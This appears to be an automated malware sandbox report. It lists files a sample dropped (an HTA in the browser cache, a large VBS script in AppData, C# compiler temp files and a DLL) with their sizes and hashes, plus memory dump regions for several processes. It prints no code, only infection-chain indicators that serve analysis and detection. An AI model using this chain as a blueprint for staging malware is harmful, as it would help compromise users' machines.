C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62

Filesize
2KB

MD5
049553456ddd48b7242d9040fa99ad18

SHA1
817919890dfc8d1c6f20384b920bff3ffa4d9040

SHA256
ffea61f4c3df0fcd7724353e4cd0b86dbdf6971675aac4535041535ab128e9fc

SHA512
4e2d74399cdf00a472686cc9dda145f3cc80072e2dfa54b05e3b235664b3390edbfa6a17cc6c15e563c71db815920e47efc52e27c212dc3c0ea84d7756f5c2dc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894

Filesize
1KB

MD5
994886924545cdda04dc5c24476e5b5f

SHA1
f3bbfdb12f6de5e056df4b52110cf747a7dc92af

SHA256
2c9b140d4179ff1085b2f8b3be295bceb1899a359496b4a6c5d09eb7229a209f

SHA512
f218c3a985428866e86b0468933b75fa68df41bff1b3d9050aeed22b4d32b9979b1b5bf478234a6e7176bf0a65310d8123d7e2925322991c40b40f53bb803584

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F53EB4E574DE32C870452087D92DBEBB_1D05198E4FEA086037F021F18838C63E

Filesize
471B

MD5
dbadb85871e4f3f4eadd95c3a506ea42

SHA1
1d09db408cd08f9246f200f38cf3b759e090d85f

SHA256
fa23a9c2aadaf557269eb5665bb0b0ba4a576a9b6b253fa8266eedfc1dc15709

SHA512
4ac8d952c6faeb666ea7eafe8cdd73219974b4cee0a9609dd6cfea26090bca3ad4069ef84a45142d0dea1d73244a1cd8042105ecd51c05615ca41df2f5bb6a29

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\75CA58072B9926F763A91F0CC2798706_056B48C93C4964C2E64C0A8958238656

Filesize
434B

MD5
252bc3ddfebf274556c038771fa0f042

SHA1
e82aed06e12b98cd47b04d4784cea6c847f97ba7

SHA256
0ad544100ff49dbd30dccafd5bd36d38a81e6e14ceb7fff0d1030587c80f2cbe

SHA512
ac2a8c351f498eef969b10a02e6e360aee2beb593db0e83075297b623ccd6f6fb8d21d033fdea6b1f61cc46f9154982510a234af91d809f87d7ece10edd0fab1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
8655bee582cff0ab931c5d5f4b936c48

SHA1
145676ab36ca3b93b5810f9945cbb3b8badd29ab

SHA256
000fdb561d21f976830e917499b7bf445ff1f3f6b7239833dc9bbed0efed2e74

SHA512
8f5a4d1ee1bca9393f12362991bc11566803b8de49315fdede1e612c074023891279eb24387de3b12ca4c8e337201a830a467d2dd490149045dd1d87494c86be

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
86b49612446b33313c56ba79b79ab934

SHA1
c140aec411d1ad91e6aa554cebf94efe064777a3

SHA256
018a0307e94da12e1ec037c59417b7ef7454018cfbeedbedac72da03790b4bf0

SHA512
af38d35f1dd27a66531453ec31dee51d803a6b08caae575e098d56ee8e25c5707059c22e3528c3df2f566ca95e66d08fe18fb31f774cc3eb6bac09ad7d0ccdd2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62

Filesize
458B

MD5
c04dbc1d56cfbb34576ea9b8f3829ff0

SHA1
e5cc1393fce54f437a4fdfbfbf747766167cd3a6

SHA256
09c98b12c914714c130613a0c4a25ce4fbbc9d662267774feef418137eb70acd

SHA512
26bfa9eefb8b2498105237348f4459aadf71da31431d507c8b48488ea4749e84275d4411b2487b8c631077d00eb691ef485691d3c04f3c7edd025bd89225df3c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894

Filesize
432B

MD5
b794b80e999335f9dce604907f341faa

SHA1
671c93556728001100f1fd98f0edeb60abcdbb76

SHA256
eb8ecd531c2073942cc757e9645f513b4216e39ddc901db33b1f2c4b511b0685

SHA512
f9cabf1acc7703f7412e4774efe848cba88bfa5958c74b96bf587b27ca52389996fc79a1e28cdde63764eec0bdd9e792f96a26a26c3d9314af57a80718ee0221

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F53EB4E574DE32C870452087D92DBEBB_1D05198E4FEA086037F021F18838C63E

Filesize
426B

MD5
53f9c5b03680e752fca1d179f2aabada

SHA1
b051b6bc2fe3fd96045554a03d1a03210680c68e

SHA256
e704f1540eb8cce7c5b6250d91bb575795c1178223f3c249dcd93cb249b504e6

SHA512
731f2f16adcdd30b376164d6655d92676edb6e458abee7593a86c3363f1ad43aced0f7919a4d0a36fc4f637b1b3a0f3e0285f654814aa5269d79920e15b5eabf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\40WV1DY9\nicegirlkissedmewithloverissingmegoodgreatthings[1].hta

Filesize
8KB

MD5
842483d04a67c27b01ea5f7c5f61b343

SHA1
0983aa82c399193df44b6092058c0e19371b0082

SHA256
499252477bb698052e47f7025764032057381aef772421a00ed801ef1282a840

SHA512
9f3ba55ff984ddafe193f69aea1410722f810fce459e7076cf503db679b0ac61911857e62d422687b459574a6914420744bc8cebd74eecda257b18e7ed6b8474

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab3CE4.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES4E50.tmp

Filesize
1KB

MD5
c508d4d46749a965448f316f1cfabd84

SHA1
5cb2c27cf8277601d8a1d44b1d670fc712f124ae

SHA256
6c57cb73acfa9a7ec622ec3001106464e0e08f1ddd72cd5b7ee89cca9cf56f87

SHA512
3906800bae9a44353ada14100bd07fc2a6577c98ec77cd9dfcebe5d0af36e098356d40b3805e319d91ce1f8a768e3ed1d97d16f1c0c76d2d4f381478b8621f77

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar3CF7.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\sh60mh25.dll

Filesize
3KB

MD5
a0a3c210e1a9a66154855a0063108a02

SHA1
f81a4b948f5780a26d289823b0f3ad88bcc5495f

SHA256
21f86359d189162ec753a594be3034208fe19e84658ab03c9d36d7117a656def

SHA512
6cc4b46f1fb9ffa928e4e958513911542b30a5c18d7c0c12eb07ed679d287bc89c63ef5bf80e423bd692a1d2435404e5364ff218dd87d204af6016f77e827d62

Download Submit
C:\Users\Admin\AppData\Local\Temp\sh60mh25.pdb

Filesize
7KB

MD5
c9e233f19179b2dcf7ba88c7b6451f33

SHA1
f926cb160417c9033b2b5edbc39d7353d9391982

SHA256
404487af05531f900e85f3ee779d2460eaa6412b83544b1356c9a7a219c4f400

SHA512
9d30e01b08e32445e88b8188f79ba73e669dfd9e6e4b34f2a19d2124cf3a7f536b6b69603c3d6ee9e0a0cd70b295e526a77399b4e6f39ca9b490d8a5410e2f79

Download Submit
C:\Users\Admin\AppData\Local\Temp\yixowleigrkefwrav

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
467ee93b8e43fd4e174e0a879aa99025

SHA1
79ae8954049ea55d3145a6d0cba752377ab05b77

SHA256
0174f64b85fea6f405a4e6360030d43e7c53cecf399d769005caccc75a98a1d2

SHA512
47bf1ef051eba379c1eab250db8dd9926401885f86747fcdf44e16d2c2098aea5993850c857e3f9e0ed774fade473bee1c88033623e7132cc46481a62324f598

Download Submit
C:\Users\Admin\AppData\Roaming\nicegirlwantmetokissherlipswellwithmylip.vbS

Filesize
213KB

MD5
b14ef4fa92414ea1658977a049f15306

SHA1
11e59f935817673e2b68cfd36e4ce93d15034714

SHA256
a6f979fe5ca109e929031fd0811506343b3089a13300438be24070650c6b6bf3

SHA512
8b627fd09767ba773acdbcce52b646b1b819b261b72c17289d443a6c7e504f34b3402a64f73d48fef893d7d38dfbeef213ed5218c211558428307d69a03f9630

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC4E4F.tmp

Filesize
652B

MD5
cea2d7053016fb928123f59e6cb436e2

SHA1
88e3c3120b9b3dbd50f2d6ef5bf0c79d16b512f0

SHA256
69ca2a63d39c7608c93a8264fdcec94d7c71b7c8c0cb4f44cf9ebfc874da020a

SHA512
95335ffd8bdd0768927570fa3b7c645a42af03cc20606eb6f77766a849c9f56c9ed420fed06f5623db576611b374209f3e0c84c1472c765ab3a21ca35711ac1a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\sh60mh25.0.cs

Filesize
478B

MD5
680c55127532e413a19eddb51b0cb473

SHA1
7d279e255bc675f1c09df8b210ee4472b5d3b8b6

SHA256
fdd40f201088921031cf300fdce7ca0be6e458b70d0f5df699cf6a0cc33a7515

SHA512
27a542c554c27adf777c741eb218b7a0634392abced081722b43c51066dfb49d604473a9df4b4e257879355cb966882431286f7bbb2ed5d8a23840d837127205

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\sh60mh25.cmdline

Filesize
309B

MD5
96c04932c1f34885b10f13c493d54252

SHA1
d849177d42d5e57ff9f4d800b93387b1e0a6fd72

SHA256
686f5fe6ccf32e1d31563b9424ac5d844a4098517fe6a6760a21cbd911222e0a

SHA512
7ec5f8df560551b42123189d19f5754066dc848203856d8939182e001c0dfd9a52374c93bf8431c738aff0f088ae2d372958f68e8d18ab6f6f2297c8b1246fd1

Download Submit
memory/1712-1-0x000000007263D000-0x0000000072648000-memory.dmp

Filesize
44KB

Download
memory/1712-136-0x0000000002420000-0x0000000002422000-memory.dmp

Filesize
8KB

Download
memory/1712-182-0x000000007263D000-0x0000000072648000-memory.dmp

Filesize
44KB

Download
memory/1712-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1888-203-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1888-205-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1888-196-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1888-192-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1888-188-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1888-202-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1888-201-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1888-200-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1888-198-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1888-190-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1888-204-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1888-228-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/1888-206-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1888-207-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1888-208-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1888-239-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1888-238-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1888-195-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1888-236-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1888-235-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1888-234-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1888-233-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1888-232-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/1888-231-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/2736-220-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2736-219-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2736-221-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2736-222-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2744-211-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2744-218-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2744-216-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2744-212-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2764-217-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2764-215-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2764-214-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2956-135-0x0000000002B90000-0x0000000002B92000-memory.dmp

Filesize
8KB

Download